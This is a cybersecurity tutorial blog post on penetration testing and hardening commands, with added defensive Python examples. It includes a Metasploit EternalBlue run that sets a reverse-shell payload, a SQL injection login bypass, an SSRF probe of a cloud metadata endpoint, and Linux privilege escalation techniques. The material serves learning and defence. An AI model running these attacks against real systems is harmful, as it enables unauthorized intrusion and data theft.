
Introduction:
The line between offensive security and criminal hacking is defined by authorization and intent. Cybersecurity professionals require the same deep technical knowledge as malicious actors to effectively defend digital assets. This article provides a foundational toolkit of essential commands and techniques used in penetration testing, incident response, and system hardening.
Learning Objectives:
- Understand and apply critical commands for network reconnaissance, vulnerability scanning, and system analysis.
- Learn to mitigate common vulnerabilities by understanding their exploitation.
- Develop a practical skillset for both Windows and Linux security environments.
You Should Know:
1. Network Reconnaissance with Nmap
Nmap is the undisputed king of network discovery and security auditing. It is used to discover hosts and services on a computer network by sending packets and analyzing the responses. For defenders, it identifies unauthorized devices and services; for penetration testers, it maps the attack surface.
Command Snippet:
Basic TCP SYN scan
nmap -sS 192.168.1.0/24
Service version detection
nmap -sV -sC target.com
OS fingerprinting
nmap -O 192.168.1.10
Aggressive scan (noisy but detailed)
nmap -A -T4 target_ip
Step-by-step guide:
- Discovery Scan (`nmap -sn 192.168.1.0/24`): This sends ICMP echo requests and TCP SYN packets to port 443 to see which hosts are up without port scanning.
- Port Scan (`nmap -sS target`): The default TCP SYN scan is stealthy as it doesn't complete the TCP handshake. It identifies open ports.
- Service Interrogation (`nmap -sV -sC target`): The `-sV` flag probes open ports to determine service/version info, while `-sC` runs a script scan using default NSE (Nmap Scripting Engine) scripts to gather further intelligence.
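The defensive use of Nmap described above (spotting unauthorized devices and services) becomes repeatable once the XML report (`nmap -oX`) is compared against an asset inventory. This is an added example, not code from the original post; the XML is a constructed sample and `INVENTORY` is a hypothetical allowlist of hosts and the TCP ports each may expose.

```python
"""Compare an Nmap XML report (nmap -oX) against an asset allowlist."""
import xml.etree.ElementTree as ET

# Constructed sample of -oX output for two hosts (not real scan data).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -sV -oX - 192.168.1.0/24">
  <host><status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.77" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
    </ports>
  </host>
</nmaprun>"""

# Hypothetical inventory: known hosts and the TCP ports each is allowed to expose.
INVENTORY = {"192.168.1.10": {22, 443}}

def parse_open_ports(xml_text):
    """Return {ip: {open TCP port, ...}} for every host Nmap reports as up."""
    result = {}
    for host in ET.fromstring(xml_text).findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        open_ports = set()
        for port in host.findall("ports/port"):
            if port.get("protocol") == "tcp" and port.find("state").get("state") == "open":
                open_ports.add(int(port.get("portid")))
        result[addr] = open_ports
    return result

def find_deviations(scan, inventory):
    """Flag hosts missing from the inventory and open ports it does not allow."""
    findings = []
    for ip, ports in sorted(scan.items()):
        if ip not in inventory:
            findings.append((ip, "unknown host", sorted(ports)))
        elif ports - inventory[ip]:
            findings.append((ip, "unapproved open ports", sorted(ports - inventory[ip])))
    return findings

if __name__ == "__main__":
    print(find_deviations(parse_open_ports(SAMPLE_NMAP_XML), INVENTORY))
```

Running the same comparison after every scheduled scan turns a one-off audit into drift detection: the first unknown host or newly opened port shows up as a finding rather than being buried in raw output.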
2. Vulnerability Scanning with Nikto
Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including dangerous files and programs, outdated server software, and version-specific problems.
Command Snippet:
Basic web server scan
nikto -h http://www.target.com
Scan on a specific port
nikto -h http://target.com -p 8080
Output results to a file
nikto -h http://target.com -o nikto_scan.html -F html
Step-by-step guide:
- Installation: Nikto is often pre-installed in Kali Linux. Otherwise, it can be installed via package managers (`apt-get install nikto`).
- Execution: Run a basic scan against the target URL. Nikto will automatically begin testing for over 6700 potentially dangerous files/CGIs, outdated versions, and other issues.
- Analysis: Review the output for critical findings like exposed configuration files, default files with information leaks, and misconfigured settings.
3. Exploiting Vulnerabilities with Metasploit
The Metasploit Framework is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It provides the infrastructure, content, and tools to perform security assessments.
Command Snippet:
Start the Metasploit console
msfconsole
Search for an exploit
msf6 > search eternalblue
Use an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
Set required options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100
Run the exploit
msf6 exploit(ms17_010_eternalblue) > exploit
Step-by-step guide:
- Initialization: Launch the `msfconsole` interface.
- Module Selection: Use the `search` command to find a relevant exploit module based on the vulnerability identified in previous steps.
- Configuration: Select the module with `use`, then configure all required options (like RHOSTS, LHOST, and PAYLOAD).
- Execution and Post-Exploitation: Run `exploit`. Upon success, you may gain a Meterpreter shell, allowing for further post-exploitation activities on the compromised system.
4. Windows System Hardening with PowerShell
PowerShell is invaluable for both attacking and defending Windows environments. These commands help in auditing and hardening a Windows system.
Command Snippet:
Get a list of all running processes
Get-Process
Check network connections
Get-NetTCPConnection
List all users
Get-LocalUser
Check firewall status and rules
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'} | Format-Table Name, DisplayName, Direction, Action
Enable Windows Defender real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false
Step-by-step guide:
- Audit Processes and Connections: Use `Get-Process` and `Get-NetTCPConnection` to identify suspicious applications and network traffic.
- Review User Accounts: `Get-LocalUser` lists all local accounts; look for unauthorized or newly created users.
- Harden the Firewall: Ensure the firewall is enabled for all profiles (Domain, Private, Public) and review active rules to block unnecessary inbound/outbound traffic.
5. Linux Privilege Escalation Techniques
After gaining initial access to a Linux system, attackers often seek to elevate their privileges to root. Understanding these techniques is crucial for defense.
Command Snippet:
Find SUID files (common privilege escalation vector)
find / -perm -u=s -type f 2>/dev/null
Check for capabilities
getcap -r / 2>/dev/null
Check crontab for scheduled tasks
crontab -l
ls -la /etc/cron*
Check for world-writable files
find / -perm -o=w -type f 2>/dev/null
Check kernel version for exploits
uname -a
Step-by-step guide:
- SUID/SGID Binaries: The `find` command locates binaries with the SUID bit set, which run with the owner's privileges. Some, like `nmap` (older versions) or `vim`, can be leveraged to gain a root shell.
- Scheduled Tasks: Inspect `crontab` entries. If a script writable by your current user is run by root, you can edit it to execute malicious code with root privileges.
- Kernel Exploits: The `uname -a` command reveals the kernel version. This can be cross-referenced with public exploits (e.g., Dirty Pipe, Dirty Cow) for potential privilege escalation.
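The scheduled-tasks check above is easy to automate from the defender's side: parse the crontab, resolve which script each entry actually executes, and flag any that a non-root user could modify. This is an added example, not part of the original post; `demo()` builds a constructed crontab over two temporary files so the check runs without touching the real system.

```python
"""Audit crontab entries for scripts that non-root users could modify."""
import os
import stat
import tempfile

INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}

def parse_cron_commands(crontab_text):
    """Return the command field of each crontab line (five time fields, then the command)."""
    commands = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # skip blanks, comments and VAR=value assignments
        fields = line.split(None, 5)
        if len(fields) == 6:
            commands.append(fields[5])
    return commands

def script_path(command):
    """The program being run, or the script passed to a known interpreter."""
    tokens = command.split()
    if len(tokens) > 1 and os.path.basename(tokens[0]) in INTERPRETERS:
        return tokens[1]
    return tokens[0] if tokens else ""

def writable_by_others(path):
    """True if the file exists and is group- or world-writable."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(crontab_text):
    """Return the absolute script paths a crontab runs that others can write to."""
    return [p for p in map(script_path, parse_cron_commands(crontab_text))
            if p.startswith("/") and writable_by_others(p)]

def demo():
    """Constructed sample: a world-writable and a locked-down script in a temp dir."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "backup.sh"), os.path.join(d, "rotate.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        open(path, "w").close()
        os.chmod(path, mode)
    crontab = (f"# m h dom mon dow command\nMAILTO=root\n"
               f"*/5 * * * * /bin/bash {bad} >/dev/null 2>&1\n0 2 * * * {good} --quiet\n")
    return audit_crontab(crontab), bad
```

On a real host, feed it the output of `crontab -l` run as root and the files under `/etc/cron*`; the same writability test applies to the directories those scripts live in, since a writable parent directory lets the script be replaced outright.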
6. API Security Testing with curl
APIs are a critical attack vector. The `curl` command is a simple yet powerful tool for manually testing API endpoints for common vulnerabilities like Broken Object Level Authorization (BOLA).
Command Snippet:
Testing for BOLA by accessing another user's resource
curl -H "Authorization: Bearer YOUR_TOKEN" https://api.example.com/v1/users/123/account
curl -H "Authorization: Bearer YOUR_TOKEN" https://api.example.com/v1/users/456/account
Testing for SQL Injection in a POST request
curl -X POST https://api.example.com/v1/login -d "username=admin&password=anything' OR '1'='1"
Testing for SSRF
curl -X POST https://api.example.com/v1/fetch -d '{"url":"http://169.254.169.254/latest/meta-data/"}'
Step-by-step guide:
- Identify Endpoints: Use API documentation to find endpoints that access user-specific resources (e.g., `/users/{id}/account`).
- Test Authorization: Authenticate as one user (User A with ID 123) and then use the same token to attempt to access the resource of another user (User B with ID 456). A successful request indicates a BOLA vulnerability.
- Test Input Validation: Send crafted inputs in parameters to test for SQLi, Command Injection, or SSRF, observing the API’s response for errors or unexpected behavior.
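The BOLA and SSRF probes above each correspond to one missing server-side check. This added example (not code from the original post) shows the `/users/{id}/account` handler in its vulnerable and hardened forms, plus a destination check for a `fetch`-style endpoint; the accounts, tokens and the injectable `resolver` are constructed for illustration.

```python
"""Server-side counterparts to the BOLA and SSRF tests above."""
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed data: accounts keyed by user id, and the subject each bearer token maps to.
ACCOUNTS = {"123": {"owner": "123", "balance": 50}, "456": {"owner": "456", "balance": 900}}
TOKENS = {"token-for-123": "123", "token-for-456": "456"}

def get_account_vulnerable(token, user_id):
    """BOLA: validates the token but never checks that it belongs to user_id."""
    if token not in TOKENS:
        return 401, None
    return (200, ACCOUNTS[user_id]) if user_id in ACCOUNTS else (404, None)

def get_account_hardened(token, user_id):
    """Object-level authorization: the token's subject must own the requested object."""
    subject = TOKENS.get(token)
    if subject is None:
        return 401, None
    account = ACCOUNTS.get(user_id)
    if account is None or account["owner"] != subject:
        return 404, None  # same answer for 'missing' and 'not yours' leaks nothing
    return 200, account

def is_safe_fetch_target(url, resolver=socket.gethostbyname):
    """SSRF guard: allow only http(s) to a host that resolves to a public address.
    The resolver is injectable so the check can run without DNS."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        addr = ipaddress.ip_address(resolver(parsed.hostname))
    except (socket.gaierror, ValueError):
        return False
    # is_global is False for loopback, RFC 1918, link-local (169.254.169.254) and similar.
    return addr.is_global
```

The SSRF check resolves the name once, so the address it validated must also be the one the request is sent to; otherwise a DNS answer that changes between check and fetch (rebinding) reopens the hole.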
7. Cloud Infrastructure Hardening (AWS CLI)
Misconfigured cloud storage services like AWS S3 are a leading cause of data breaches. The AWS Command Line Interface is essential for auditing and securing these resources.
Command Snippet:
List all S3 buckets
aws s3 ls
Check the ACL of a specific bucket
aws s3api get-bucket-acl --bucket my-bucket-name
Check the bucket policy
aws s3api get-bucket-policy --bucket my-bucket-name
Block all public access at the bucket level
aws s3api put-public-access-block --bucket my-bucket-name --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
Step-by-step guide:
- Inventory and Audit: Use `aws s3 ls` to list all buckets. Then, for each bucket, check its Access Control List (ACL) and bucket policy to identify any grants for `http://acs.amazonaws.com/groups/global/AllUsers` (which represents public access).
- Remediate Misconfigurations: If public access is found and not explicitly required, use the `put-public-access-block` command to enforce a strict no-public-access policy. This is a critical step in preventing data leaks from misconfigured S3 buckets.
What Undercode Says:
- The modern defender’s skill set must mirror that of the attacker. Proficiency in these offensive tools is not for malice but for building resilient, tested defenses.
- Security is a continuous process, not a state. Regular auditing, patching, and configuration hardening using these command-line tools are fundamental to maintaining a strong security posture.
The tools and commands detailed here form the bedrock of practical cybersecurity. While powerful individually, their true strength is realized when used in a structured, methodological process—from initial reconnaissance (Nmap) to vulnerability identification (Nikto), exploitation (Metasploit), and post-compromise analysis (Privilege Escalation). For defenders, this knowledge is non-negotiable. It enables proactive threat hunting, robust incident response, and the ability to think like an adversary to anticipate their moves. The command line remains the most precise and powerful interface for this work, cutting through the abstractions of GUI tools to provide direct control and deep visibility into system operations and security controls.
Prediction:
The democratization of hacking tools and knowledge will continue to lower the barrier to entry for cyber threats, making sophisticated attacks more common. Consequently, the demand for technically proficient defenders who can operate at the command-line level will skyrocket. AI will begin to automate the execution of these commands for both attack and defense, leading to an AI-driven arms race in cybersecurity. However, the fundamental principles of reconnaissance, exploitation, and hardening will remain relevant, with human expertise required to interpret context, manage complex campaigns, and make strategic decisions that machines cannot.
Reported By: Ouardi Mohamed – Hackers Feeds